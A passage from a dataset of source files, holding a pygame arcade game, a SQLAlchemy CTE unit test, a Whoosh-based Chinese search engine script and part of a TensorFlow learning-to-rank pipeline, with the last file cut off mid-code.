\"\"\"Get section of the image\n\n :param position_x: position of the runner\n :param width_x: width of the screen\n :param image_in: input image\n :return:\n \"\"\"\n image_out = np.zeros((width_x, image_in.shape[1], image_in.shape[2]))\n start = position_x % image_in.shape[0]\n stop = start + width_x\n if stop < image_in.shape[0]:\n image_out[:, :, :] = image_in[start:stop, :, :]\n else:\n delta = image_in.shape[0] - start\n image_out[:delta, :, :] = image_in[start:, :, :]\n image_out[delta:, :, :] = image_in[:width_x - delta, :, :]\n return image_out\n\n\ndef compute_mask(sprite):\n \"\"\"Compute foreground mask; pixel that are covered by the sprite\n\n :param sprite: sprite input\n :return: mask\n \"\"\"\n mask = np.zeros((sprite.shape[0], sprite.shape[1]))\n indices_fg = sprite[:, :, 3] > 0\n mask[indices_fg] = 1\n return mask\n\n\ndef add_mask(mask, offset_x, offset_y, field):\n \"\"\"\n\n :param mask:\n :param offset_x:\n :param offset_y:\n :param field:\n :return:\n \"\"\"\n for xm in range(mask.shape[0]):\n for ym in range(mask.shape[1]):\n x = xm + offset_x\n y = ym + offset_y\n if 0 <= x < field.shape[0] and 0 <= y < field.shape[1]:\n field[x, y] += mask[xm, ym]\n\n\ndef check_collision(player, obstacles, max_x, max_y):\n \"\"\"Check the collision between the player and the list of obstacles in the area\n 0:max_x, 0:max_y\n\n :param player:\n :param obstacles:\n :param max_x:\n :param max_y:\n :return:\n \"\"\"\n field = np.zeros((max_x, max_y))\n add_mask(player.mask, player.x, player.y, field)\n for obstacle in obstacles:\n add_mask(obstacle.mask, obstacle.x, obstacle.y, field)\n max_val = np.max(field[:])\n if max_val > 1:\n return True\n return False\n\n\nclass Player:\n def __init__(self, x, y, sprites_running, sprite_jumping, sprite_standing, sprite_dead):\n \"\"\"\n\n :param x:\n :param y:\n \"\"\"\n self.parabola = SENSORLAND_PARABOLAS[0]\n self.is_jumping = False\n self.is_dead = False\n self.is_running = False\n self.parabola_position = 0\n self.x = x\n self.y = y\n # Load jump sound\n self.sound_jump = pygame.mixer.Sound('sensorland/sound/jump.wav')\n # Init the sprites\n self.sprite_jumping = sprite_jumping\n self.sprite_running = sprites_running\n self.sprite_running_id = 0\n self.sprite_standing = sprite_standing\n self.sprite_dead = sprite_dead\n self.sprite = sprite_standing\n # Init the masks\n self.mask_jumping = compute_mask(self.sprite_jumping)\n self.mask_running = [compute_mask(sprite) for sprite in self.sprite_running]\n self.mask = self.mask_running[self.sprite_running_id]\n\n def jump(self):\n \"\"\"\n\n :return:\n \"\"\"\n if not self.is_jumping:\n self.is_jumping = True\n pygame.mixer.Sound.play(self.sound_jump)\n\n def die(self):\n \"\"\"\n\n :return:\n \"\"\"\n self.is_dead = True\n self.sprite = self.sprite_dead\n\n def update(self, iteration):\n \"\"\"\n\n :return:\n \"\"\"\n # check dead ? dead ?\n if self.is_dead:\n self.sprite = self.sprite_dead\n return\n # if jumping do jump sprite\n if self.is_jumping:\n self.sprite = self.sprite_jumping\n self.mask = self.mask_jumping\n self.y = self.y + self.parabola[self.parabola_position]\n self.parabola_position += 1\n if self.parabola_position >= len(self.parabola):\n self.parabola_position = 0\n self.is_jumping = False\n # Animate running\n else:\n if iteration % 5 == 0:\n self.sprite_running_id = (self.sprite_running_id + 1) % len(self.sprite_running)\n self.sprite = self.sprite_running[self.sprite_running_id]\n self.mask = self.mask_running[self.sprite_running_id]\n\n\ndef create_stefan():\n \"\"\" Function that initializes Stefan\n\n :return: Player Stefan\n \"\"\"\n stefan_0 = load_and_transpose_image('sensorland/images/stefan_0.png')\n stefan_1 = load_and_transpose_image('sensorland/images/stefan_1.png')\n stefan_jumping = load_and_transpose_image('sensorland/images/stefan_jumping.png')\n stefan_dead = load_and_transpose_image('sensorland/images/stefan_dead.png')\n stefan_standing = load_and_transpose_image('sensorland/images/stefan_standing.png')\n return Player(5, GROUND_LEVEL, [stefan_0, stefan_1], stefan_jumping, stefan_standing, stefan_dead)\n\n\nclass Element:\n def __init__(self, sprite, x, y):\n \"\"\"Initial element with its sprite and position\n\n :param sprite:\n :param x:\n :param y:\n \"\"\"\n self.sprite = sprite.copy()\n self.x = x\n self.y = y\n self.mask = compute_mask(self.sprite)\n\n def is_alive(self):\n \"\"\"Check if the element is still on the screen or could be removed\n\n :return:\n \"\"\"\n if self.x + self.sprite.shape[0] < 0:\n return False\n return True\n\n def move_relative(self, delta_x, delta_y):\n \"\"\"Move Element relative to the current position\n\n :param delta_x:\n :param delta_y:\n :return:\n \"\"\"\n self.x += delta_x\n self.y += delta_y\n\n\ndef get_obstacle():\n \"\"\"Get a new obstacle\n\n :return: An obstacle\n \"\"\"\n n_obstacles = 5\n obstacle_id = random.randint(0, n_obstacles-1)\n if obstacle_id == 0:\n image = load_and_transpose_image('sensorland/images/resistor.png')\n spawn_pos = [69, 35]\n elif obstacle_id == 1:\n image = load_and_transpose_image('sensorland/images/capacitor_0.png')\n spawn_pos = [69, 38]\n elif obstacle_id == 2:\n image = load_and_transpose_image('sensorland/images/voltage_regulator.png')\n spawn_pos = [70, 38]\n elif obstacle_id == 3:\n image = load_and_transpose_image('sensorland/images/led_red.png')\n spawn_pos = [68, 36]\n else:\n image = load_and_transpose_image('sensorland/images/led_green.png')\n spawn_pos = [68, 36]\n return Element(image, spawn_pos[0], spawn_pos[1])\n\n\nclass SensorLandGame:\n def __init__(self):\n self.path = os.path.dirname(__file__)\n self.display = 0\n self.mountains = 0\n self.input_control = 0\n self.player_y = GROUND_LEVEL\n self.circuit = Circuit()\n self.score = 0\n\n def get_title_image(self):\n \"\"\"Get the iconic image of the game\n\n \"\"\"\n im = img.imread('sensorland/images/stefan_in_sensor_land.png')\n image = np.transpose(im[:, :, :3], (1, 0, 2)) * 255\n return image\n\n def do_mountains(self, mountains, position):\n \"\"\"Move the mountains\n\n :return:\n \"\"\"\n m = get_image_scene(position, self.display.size_x, mountains)\n self.display.place_sprite(m, 0, 21)\n\n def do_circuit(self, rel_movement, level_id=0):\n \"\"\"Move the circuit\n\n :return:\n \"\"\"\n self.circuit.scroll(rel_movement)\n m = self.circuit.image[0:64, :, :]\n m = transform_color(m, CIRCUIT_RED_VALUES, CIRCUIT_TARGET_VALUES[level_id])\n self.display.place_sprite(m, 0, 46)\n\n def do_sky(self, sky, iteration):\n \"\"\"\n\n :param sky:\n :param iteration:\n :return:\n \"\"\"\n x = int(32 + np.cos(iteration / 120) * 32)\n y = int(32 + np.sin(iteration / 120) * 32)\n self.display.show_image(sky[x:x + 64, y:y + 64, :])\n\n def do_level(self, level_id):\n \"\"\"Execute a certain level, the speed etc. is configured above and\n accessed via the level id\n\n :param level_id: id of the currenct level\n :return: True -> Stefan is still running\n False -> Stefan crushed with sth.\n \"\"\"\n # Ready Player 1\n mountains = img.imread('sensorland/images/mountains3.png')\n mountains = np.transpose(mountains, (1, 0, 2)) * 255\n sky = img.imread('sensorland/images/sky2.png')\n sky = np.transpose(sky, (1, 0, 2)) * 255\n stefan = create_stefan()\n speed = SENSORLAND_SPEED[level_id]\n iteration_increment = SENSORLAND_ITERATION_INC[level_id]\n level_end = SENSORLAND_END_OF_ROAD[level_id]\n min_peace_time = 40\n remaining_peace_time = 40 * (1 + (iteration_increment-1)/2)\n obstacles = []\n running = True\n move_pixels_remainder = 0\n #Game Loop\n self.parabola = SENSORLAND_PARABOLAS[level_id]\n while running:\n remaining_peace_time -= 1\n remaining_level = level_end-self.score\n move_pixels_total = move_pixels_remainder + speed\n move_pixels_integer = int(move_pixels_total)\n move_pixels_remainder = move_pixels_total - move_pixels_integer\n if remaining_level <= 0:\n running = False\n if remaining_peace_time == 0 and remaining_level > (100 * iteration_increment):\n remaining_peace_time = random.randint(min_peace_time, 2*min_peace_time)\n obstacle = get_obstacle()\n obstacles.append(obstacle)\n dead_obstacles = []\n for obst in obstacles:\n obst.move_relative(-move_pixels_integer, 0)\n if not obst.is_alive():\n dead_obstacles.append(obst)\n for obst in dead_obstacles:\n obstacles.remove(obst)\n self.do_sky(sky, self.score * 1)\n self.do_mountains(mountains, int(self.score * 1))\n self.do_circuit(move_pixels_integer, level_id)\n for obst in obstacles:\n self.display.place_sprite(obst.sprite, obst.x, obst.y)\n # Jump\n events = pygame.event.get()\n if self.input_control.flex_chain:\n if self.input_control.button_a_pressed == 1:\n self.input_control.button_a_pressed = 0\n stefan.jump()\n if self.input_control.button_shutdown_pressed_long:\n shut = ShutDown()\n shut.run_game(self.display, self.input_control)\n if self.input_control.button_b_pressed:\n self.input_control.button_b_pressed = 0\n return -1\n\n if self.input_control.keyboard:\n for event in events:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n stefan.jump()\n if event.key == pygame.K_q:\n return -1\n if event.key == pygame.K_ESCAPE:\n shut = ShutDown()\n shut.run_game(self.display, self.input_control)\n\n # Move\n stefan.update(self.score)\n # Check collision\n stefan_is_dead = check_collision(stefan, obstacles, self.display.size_x, self.display.size_y)\n if stefan_is_dead:\n stefan.die()\n running = False\n self.display.place_sprite(stefan.sprite, stefan.x, stefan.y)\n\n self.score += iteration_increment\n # show score\n self.display.write_string(\"SCORE\", 1, 0, background=None)\n self.display.write_string(\"{:8d}\".format(self.score), 20, 0, background=None)\n # show next speed\n if remaining_level < (50 * iteration_increment):\n self.display.write_string(\"NEXT LEVEL\", 10, 30, background=None)\n self.display.show()\n time.sleep(0.04)\n if stefan_is_dead:\n time.sleep(1)\n return 0\n return 1\n\n def run_game(self, display, input_control):\n \"\"\"Run the Game\n\n \"\"\"\n self.display = display\n self.input_control = input_control\n leader_board = LeaderBoard('sensorland/records.txt')\n\n mountains = img.imread('sensorland/images/mountains3.png')\n mountains = np.transpose(mountains, (1, 0, 2)) * 255\n\n sky = img.imread('sensorland/images/sky2.png')\n sky = np.transpose(sky, (1, 0, 2)) * 255\n\n # Ready Player 1\n stefan = create_stefan()\n # wait for 1st keypress\n wait_for_start = True\n self.input_control.button_a_pressed = 0\n while wait_for_start:\n self.do_sky(sky, 0)\n self.do_mountains(mountains, 0)\n self.do_circuit(0)\n self.display.place_sprite(stefan.sprite, stefan.x, stefan.y)\n if self.input_control.flex_chain:\n if self.input_control.button_a_pressed == 1:\n self.input_control.button_a_pressed = 0\n wait_for_start = False\n if self.input_control.button_shutdown_pressed_long:\n shut = ShutDown()\n shut.run_game(self.display, self.input_control)\n if self.input_control.button_b_pressed:\n self.input_control.button_b_pressed = 0\n return\n\n events = pygame.event.get()\n if self.input_control.keyboard:\n for event in events:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n wait_for_start = False\n elif event.key == pygame.K_q:\n return\n elif event.key == pygame.K_ESCAPE:\n shut = ShutDown()\n shut.run_game(self.display, self.input_control)\n\n time.sleep(0.1)\n self.display.show()\n\n self.score = 0\n pygame.mixer.music.load('sensorland/sound/theme.mp3')\n pygame.mixer.music.play(-1, 0.0)\n\n #Execute the different levelz\n for level_id in range(6):\n alive = self.do_level(level_id=level_id)\n if alive == 0:\n break\n if alive == -1:\n pygame.mixer.music.pause()\n return\n\n time.sleep(1)\n self.display.clear_screen()\n score_image = img.imread(os.path.join(self.path, 'images/high_score.png'))\n score_image = np.transpose(score_image[:, :, :3], (1, 0, 2)) * 255\n self.display.fade_to_image(score_image)\n self.display.write_string(\"HIGH SCORE\", 13, 5, [236, 173, 42], background=None)\n leader_board.fg_color = [0, 255, 255]\n leader_board.bg_color = None\n leader_board.run_leader_board(self.score, self.display, self.input_control)\n time.sleep(2)\n pygame.mixer.music.pause()\n","repo_name":"benjamindrayer/arcade","sub_path":"sensorland/sensorland.py","file_name":"sensorland.py","file_ext":"py","file_size_in_byte":18821,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"33012647621","text":"def test_cte():\n from datetime import date\n\n from sqlalchemy import Column, Date, Integer, MetaData, Table, literal, select\n\n from snowflake.sqlalchemy import snowdialect\n\n metadata = MetaData()\n visitors = Table(\n \"visitors\",\n metadata,\n Column(\"product_id\", Integer),\n Column(\"date1\", Date),\n Column(\"count\", Integer),\n )\n product_id = 1\n day = date.today()\n count = 5\n with_bar = select(literal(product_id), literal(day), literal(count)).cte(\"bar\")\n sel = select(with_bar)\n ins = visitors.insert().from_select(\n [visitors.c.product_id, visitors.c.date1, visitors.c.count], sel\n )\n assert str(ins.compile(dialect=snowdialect.dialect())) == (\n \"INSERT INTO visitors (product_id, date1, count) WITH bar AS \\n\"\n \"(SELECT %(param_1)s AS anon_1, %(param_2)s AS anon_2, %(param_3)s AS anon_3)\\n\"\n \" SELECT bar.anon_1, bar.anon_2, bar.anon_3 \\n\"\n \"FROM bar\"\n )\n","repo_name":"snowflakedb/snowflake-sqlalchemy","sub_path":"tests/test_unit_cte.py","file_name":"test_unit_cte.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"72"} +{"seq_id":"1314018396","text":"from whoosh.index import create_in\r\nfrom whoosh.fields import *\r\nfrom jieba.analyse import ChineseAnalyzer\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom collections import defaultdict\r\nimport pickle\r\nimport jieba\r\nfrom whoosh.index import open_dir\r\nimport numpy as np\r\n\r\nclass Index:\r\n url_all=set()# url集合\r\n url_anchor_dict=defaultdict()#url对应的锚文本\r\n url_relatedurl_dict=defaultdict(list)# url与指向的其他url的映射\r\n url_content_dict=defaultdict()#url对应的文本内容\r\n url_id_dict=defaultdict()# url到id的映射\r\n id_url_dict=defaultdict()#id到url的映射\r\n url_all_content_dict=defaultdict() #url相关的所有内容\r\n url_title_dict=defaultdict() #保存url的title\r\n url_docvector_dict=defaultdict()#url对应的文档向量\r\n url_vectorlen_dict=defaultdict()#url对应的文档向量的长度\r\n url_pagerank_dict=defaultdict() #保存url的pagerank值\r\n ix=None #索引\r\n data_dir=\"./data/\"\r\n tfidfVectorizer=None #tfidf模型\r\n \r\n def __init__(self):\r\n self.ix= open_dir('./index')\r\n with open(self.data_dir+\"url\",\"rb\") as f:\r\n self.url_all=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_anchor_dict.txt\",\"rb\") as f:\r\n self.url_anchor_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_relatedurl_dict.txt\",\"rb\") as f:\r\n self.url_relatedurl_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_content_dict\",\"rb\") as f:\r\n self.url_content_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_id_dict\",\"rb\") as f:\r\n self.url_id_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"id_url_dict.txt\",\"rb\") as f:\r\n self.id_url_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_title_dict\",\"rb\") as f:\r\n self.url_title_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_pagerank_dict.txt\",\"rb\")as f:\r\n self.url_pagerank_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_all_content_dict.txt\",\"rb\")as f:\r\n self.url_all_content_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_docvector_dict.txt\",\"rb\")as f:\r\n self.url_docvector_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"url_vectorlen_dict.txt\",\"rb\")as f:\r\n self.url_vectorlen_dict=pickle.load(f)\r\n f.close()\r\n with open(self.data_dir+\"tfidfVectorizer.txt\",\"rb\")as f:\r\n self.tfidfVectorizer=pickle.load(f)\r\n f.close()\r\n\r\n #建立索引\r\n def create_index(self):\r\n # 创建schema, stored为True表示能够被检索\r\n schema = Schema(urlid=NUMERIC(stored=True),\r\n content=TEXT(stored=True, analyzer=ChineseAnalyzer())\r\n )\r\n # 存储schema信息至indexdir目录\r\n indexdir = './index/'\r\n self.ix = create_in(indexdir, schema)\r\n # 按照schema定义信息,增加需要建立索引的文档\r\n writer = self.ix.writer()\r\n for urlid in self.url_all_content_dict.keys():\r\n all_content = self.url_all_content_dict[urlid]\r\n writer.add_document(urlid=urlid,content=all_content)\r\n writer.commit()\r\n \r\n #查询\r\n def query(self):\r\n # 创建一个检索器\r\n searcher = self.ix.searcher()\r\n while(1):\r\n sentence=input(\"请输入要查询的内容:\")\r\n if sentence==\"close\":\r\n break\r\n results = searcher.find(\"content\", sentence,limit=None)\r\n print('一共发现%d份文档:' % len(results))\r\n best_result=self.result_rank(results,sentence) #评分\r\n #输出排名前十的答案\r\n for i in range(0,min(15,len(best_result))):\r\n result_id=best_result[i][0]\r\n result_url=self.id_url_dict[result_id]\r\n print(result_url)\r\n \r\n #结巴分词\r\n def get_words_jieba(self,text):\r\n words_after_jieba=jieba.cut(text,cut_all=False)\r\n return words_after_jieba\r\n \r\n #结果排序\r\n def result_rank(self,results,sentence):\r\n sentence_array=self.query_vector(sentence)\r\n url_value={}\r\n #综合考虑向量模型和pagerank\r\n for i in range(len(results)):\r\n id=(results[i].fields())[u\"urlid\"]\r\n url_docv=self.url_docvector_dict[id]\r\n length=self.url_vectorlen_dict[id]\r\n cos=np.sum(url_docv*sentence_array)/length\r\n url_value[id]=cos+self.url_pagerank_dict[id] #向量模型夹角+pagerank的值\r\n url_value=sorted(url_value.items(), key=lambda item:item[1], reverse=True)\r\n return url_value\r\n \r\n #查询词的向量\r\n def query_vector(self,sentence):\r\n sentence_after_jieba=self.get_words_jieba(sentence)\r\n sentence_t=self.tfidfVectorizer.transform(sentence_after_jieba)\r\n sentence_array=sentence_t.toarray()\r\n return sentence_array\r\n\r\nif __name__=='__main__':\r\n index=Index()\r\n #index.create_index()\r\n index.query()","repo_name":"tolstoy-yun/Search-Engines_NKU","sub_path":"index_query.py","file_name":"index_query.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20784259912","text":"from mt.data.dataset.callbacks.tokenizer_callback import TokenizerCallback\nfrom mt.data.dataset.callbacks.feature_callbacks import FeatureMerger, NormalizeAlongAxis, LayoutEncoder, FeatureTransformationCallback\nfrom mt.data.dataset.parser import SeqExampleParser, ExampleParser\nfrom mt.data.dataset.sampler import SequenceExampleSampler\nfrom mt.data.dataset.utils import concat_from_zipped_datasets, SampleWeighter, has_positives_and_negatives, calc_label_distribution\nfrom mt.data.utils import get_blocklist\n\nfrom mt.models.lse.encoder import DSSM, AttnDSSM, USE\nfrom mt.models.ltr import espec, espec_val, cspec\nfrom mt.models.ltr.attnrank import AttnRank\nfrom mt.models.ltr.mlp import MLPRank\nfrom mt.models.ltr.drmm import DHRMM\nfrom mt.models.ltr.knrm import HybridKNRM\nfrom mt.models.model_io import s3_get_keras_model\nfrom mt.models.callbacks import TransformerLRSchedule, SaveCallback\n\nfrom mt.models.ultr.joe import JointEstimator\nfrom mt.tokenizer.tokenizer_io import load_bert_tokenizer_from_vocab_path, get_vocab_from_s3\nfrom mt.utils import ensure_url_format\nfrom mt.config import config\n\nimport tensorflow as tf\nimport tensorflow.keras as nn\n\nfrom abc import ABC, abstractmethod\nfrom typing import Union\nfrom dataclasses import dataclass\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom mt.evaluation.utils.inspection_utils import prepare_tokens_for_print\nimport warnings\n\n\n@dataclass\nclass PipelineConfig:\n num_negatives: int\n random_negatives: int\n list_size: int\n num_tasks: int\n epochs: int\n batch_size: int\n learning_rate: Union[float, nn.optimizers.schedules.LearningRateSchedule]\n sampling_weight_col: str = None\n sample_w_replacement: bool = False\n normalize_input: bool = False\n val_metric_to_monitor: str = \"val_loss\"\n loss_weights: dict=None\n\n @property\n def mode(self):\n if self.val_metric_to_monitor == \"val_loss\":\n return \"min\"\n else:\n return \"max\"\n\n\nclass BasePipeline(ABC):\n\n def __init__(self,\n model_url,\n vocab_url, \n pbk_url,\n pipeline_config: PipelineConfig,\n ) -> None:\n\n self.pipeline_config = pipeline_config\n\n self.tokenizer, self.vocab = load_bert_tokenizer_from_vocab_path(vocab_url, return_vocab=True)\n self.pbks = get_vocab_from_s3(pbk_url)\n self.pbk_lookup = tf.keras.layers.StringLookup(vocabulary=self.pbks)\n\n self.model_url = ensure_url_format(model_url)\n\n self.tokenizer_callback = self.get_tokenizer()\n\n\n def get_tokenizer(self):\n \n if not config.MAX_TOKENS:\n seq_length=None\n else:\n seq_length={config.QUERY_COL: config.MAX_TOKENS, \n config.PRODUCT_TITLE_COL: config.MAX_TOKENS}\n\n tokenizer_callback = TokenizerCallback(tokenizer=self.tokenizer, \n cols=[config.QUERY_COL, config.PRODUCT_TITLE_COL],\n max_length=seq_length)\n\n return tokenizer_callback\n\n @abstractmethod \n def training_dataset(self, train_path):\n pass\n\n @abstractmethod \n def validation_dataset(self, val_path):\n pass\n\n @abstractmethod\n def get_model(self, name, *args, **kwargs):\n pass\n\n @abstractmethod\n def start(self, callbacks, **kwargs):\n pass\n\n\nclass BaseEncoderPipeline(BasePipeline):\n\n def __init__(self, \n model_url, \n encoder_name,\n vocab_url, \n pbk_url, \n pipeline_config: PipelineConfig, \n embedder_name=None) -> None:\n\n super().__init__(model_url, vocab_url, pbk_url, pipeline_config, embedder_name)\n\n self.encoder, self.optimizer = self.get_encoder(encoder_name)\n\n def get_model(self, name, learning_rate):\n\n def get_use():\n d_model = 256\n encoder = USE(len(self.vocab), embedding_dim=d_model, dff=1024, num_attn_heads=4,\n num_attn_layers=2, dropout_rate=0.1)\n learning_rate = TransformerLRSchedule(d_model)\n optimizer = tf.keras.optimizers.Adam(\n learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)\n return encoder, optimizer\n\n def get_dssm():\n encoder = DSSM(len(self.vocab), embedding_dim=300, dense_layer_nodes=[300, 300],\n batch_norm=True, dropout_rate=0.3)\n\n optimizer = nn.optimizers.Adam(learning_rate=learning_rate, clipnorm=3.0)\n return encoder, optimizer\n\n def get_dssm_w_attn():\n encoder = AttnDSSM(len(self.vocab), embedding_dim=300, sentence_emb_dim=128)\n optimizer = nn.optimizers.Adam(learning_rate=learning_rate, clipnorm=3.0)\n return encoder, optimizer\n\n if name == \"dssm\":\n encoder, optimizer = get_dssm()\n elif name == \"use\":\n encoder, optimizer = get_use()\n elif name == \"dssm_w_attn\":\n encoder, optimizer = get_dssm_w_attn()\n\n return encoder, optimizer\n\n\nclass BaseLTRPipeline(BasePipeline):\n\n def __init__(self, \n model_url, \n vocab_url, \n pbk_url, \n pipeline_config: PipelineConfig, \n encoder_name=None, \n classifier_name=None, \n embedder_name=None) -> None:\n\n super().__init__(model_url, vocab_url, pbk_url, pipeline_config)\n\n if encoder_name:\n self.encoder = s3_get_keras_model(encoder_name, self.model_url)\n\n if classifier_name:\n self.pbk_classifier = s3_get_keras_model(classifier_name, self.model_url)\n\n if embedder_name:\n embedder = s3_get_keras_model(embedder_name, self.model_url)\n self.embedding_layer = embedder.embedding_layer\n else:\n self.embedding_layer = None\n\n self.feature_merger = FeatureMerger(config.MERGE_COLS, merged_feature_name=config.NUMERIC_FEATURES_COL)\n\n self.sequence_parser = SeqExampleParser(espec, cspec, list_size=self.pipeline_config.list_size)\n\n if self.pipeline_config.normalize_input:\n warnings.warn(\"input normalization is activated\")\n self.normalize_num_features = NormalizeAlongAxis(column=config.NUMERIC_FEATURES_COL, axis=[0,1], mask_value=-1, kind=\"z_norm\")\n elif self.pipeline_config.num_negatives == -1:\n warnings.warn(\"\"\"input is not normalized, however no sampling is performed. \n This can lead to numerical issues, since BatchNormalization will not take \n into account the masking!\"\"\")\n\n # NOTE 72 should be enough for validation set\n self.sequence_parser_val = SeqExampleParser(espec_val, cspec, list_size=config.MAX_SEQ_LENGTH)\n\n self.example_parser = ExampleParser(espec)\n\n self.sampler = SequenceExampleSampler(num_negatives=self.pipeline_config.num_negatives, \n replacement=self.pipeline_config.sample_w_replacement,\n sample_weight=self.pipeline_config.sampling_weight_col)\n\n self.feature_transformer = self.get_feature_transformer()\n self.layout_encoder = self.get_layout_encoder()\n\n self.sample_weighter = SampleWeighter(self.pipeline_config.num_tasks, self.pipeline_config.loss_weights)\n\n\n def get_feature_transformer(self):\n\n feature_transformations1 = {\n k: lambda x: tf.where(tf.not_equal(x, -1),\n tf.math.log1p(tf.maximum(0.0, tf.cast(x, tf.float32))), \n tf.cast(x, tf.float32))\n for k in config.LOG1P_TRANSFORM_COLS\n }\n\n feature_transformations2 = {k: lambda x: tf.expand_dims(x, -1) for k in config.NUMERICAL_COLUMNS}\n\n one_hot_transformation = []\n for k,v in config.CATEGORICAL_FEATURES.items():\n lookup = tf.keras.layers.StringLookup(vocabulary=v)\n transformation = {k: lambda x: tf.one_hot(lookup(x)-1, len(v))}\n one_hot_transformation.append(transformation)\n\n transform_callback = FeatureTransformationCallback(column_operation_mappings=[feature_transformations1,\n feature_transformations2,\n *one_hot_transformation])\n return transform_callback\n\n\n def get_layout_encoder(self):\n device_lookup = tf.keras.layers.StringLookup(vocabulary=config.DEVICE_VOCAB)\n layout_lookup = tf.keras.layers.StringLookup(vocabulary=config.LAYOUT_VOCAB)\n\n layout_kwargs = {\"interaction_cols\": None,\n \"merge_cols\": config.POSITION_BIAS_FEATURES,\n \"column_operation_mapping\": {\n # position starts with one, hence subtract by one, since one_hot_expects values starting from 0\n config.POSITION_COL: lambda x: tf.one_hot(tf.cast(x-1, tf.int64), config.MAX_SEQ_LENGTH),\n config.DEVICE_COL: lambda x: tf.one_hot(device_lookup(x)-1, len(config.DEVICE_VOCAB)),\n config.LAYOUT_COL: lambda x: tf.one_hot(\n layout_lookup(x)-1, len(config.LAYOUT_VOCAB))\n },\n \"feature_name\": config.POS_BIAS_FEATURE_COL}\n\n layout_encoder = LayoutEncoder(**layout_kwargs)\n\n return layout_encoder\n\n def get_model(self, name, **kwargs):\n\n def get_attnrank():\n attnrank = AttnRank(self.encoder,\n classifier=self.pbk_classifier,\n pbks=self.pbks,\n embedding_layer=self.embedding_layer,\n num_tasks=self.pipeline_config.num_tasks,\n **kwargs) # .build_graph() # NOTE: build_graph is important as it ensures dynamic shape after loading\n return attnrank\n\n def get_mlp():\n mlp = MLPRank(self.encoder,\n classifier=self.pbk_classifier,\n pbks=self.pbks,\n num_tasks=self.pipeline_config.num_tasks,\n **kwargs) # NOTE: build_graph should be implemented\n return mlp\n\n def get_drmm():\n drmm = DHRMM(self.encoder.embedding_layer,\n pbk_classifier=self.pbk_classifier, \n pbks=self.pbks, \n **kwargs) # NOTE: build_graph should be implemented\n return drmm\n\n def get_knrm():\n drmm = HybridKNRM(self.encoder.embedding_layer,\n pbk_classifier=self.pbk_classifier, \n pbks=self.pbks, \n **kwargs) # NOTE: build_graph should be implemented\n return drmm\n\n if name == \"attnrank\":\n ranker = get_attnrank()\n elif name == \"mlp\":\n ranker = get_mlp()\n elif name == \"drmm\":\n ranker = get_drmm() \n elif name == \"knrm\":\n ranker = get_knrm()\n return ranker\n\n @abstractmethod \n def training_dataset(self, *args, **kwargs):\n pass\n\n @abstractmethod \n def validation_dataset(self, *args, **kwargs):\n pass\n\n\nclass LTRPipeline(BaseLTRPipeline):\n def __init__(self,\n model_url, \n vocab_url, \n pbk_url, \n pipeline_config: PipelineConfig, \n encoder_name=None, \n classifier_name=None, \n embedder_name=None) -> None:\n super().__init__(model_url=model_url,\n encoder_name=encoder_name,\n classifier_name=classifier_name,\n vocab_url=vocab_url, pbk_url=pbk_url,\n pipeline_config=pipeline_config,\n embedder_name=embedder_name)\n\n\n def training_dataset(self, *args, **kwargs):\n if self.pipeline_config.random_negatives > 0:\n return self._training_dataset_w_additional_negatives(*args, **kwargs)\n else:\n return self._training_dataset(*args, **kwargs)\n\n def validation_dataset(self):\n \n normalize_judgements = NormalizeAlongAxis(column=config.JUDGEMENT_COL,\n axis=1, mask_value=-1, kind=\"min_max\")\n\n ds_val = (tf.data.Dataset.list_files(\"training_data/val/*.tfrecord\")\n .interleave(tf.data.TFRecordDataset, num_parallel_calls=tf.data.AUTOTUNE)\n .shuffle(10_000)\n .batch(50)\n .map(self.sequence_parser_val, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.tokenizer_callback, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_transformer, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_merger, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.layout_encoder, num_parallel_calls=tf.data.AUTOTUNE)\n .map(normalize_judgements, num_parallel_calls=tf.data.AUTOTUNE)\n .map(calc_label_distribution, num_parallel_calls=tf.data.AUTOTUNE))\n\n if hasattr(self, \"normalize_num_features\"):\n # add the normalization callback if it exists\n ds_val = ds_val.map(self.normalize_num_features,\n num_parallel_calls=tf.data.AUTOTUNE)\n\n return ds_val\n\n\n def _training_dataset(self):\n \n ds = (tf.data.Dataset.list_files(\"training_data/train/*.tfrecord\", shuffle=True)\n .interleave(tf.data.TFRecordDataset, num_parallel_calls=tf.data.AUTOTUNE)\n .shuffle(100_000)\n .batch(self.pipeline_config.batch_size)\n .map(self.sequence_parser, num_parallel_calls=tf.data.AUTOTUNE))\n\n if self.pipeline_config.num_negatives != -1:\n # if we sample a positive along with several negatives, we need to make sure \n # that there are actually positive and negative examples in the sequence\n ds = (ds.unbatch()\n .filter(has_positives_and_negatives)\n .batch(self.pipeline_config.batch_size))\n\n ds = (ds.map(self.sampler, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.tokenizer_callback, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.sample_weighter, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_transformer, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.feature_merger, num_parallel_calls=tf.data.AUTOTUNE)\n .map(self.layout_encoder, 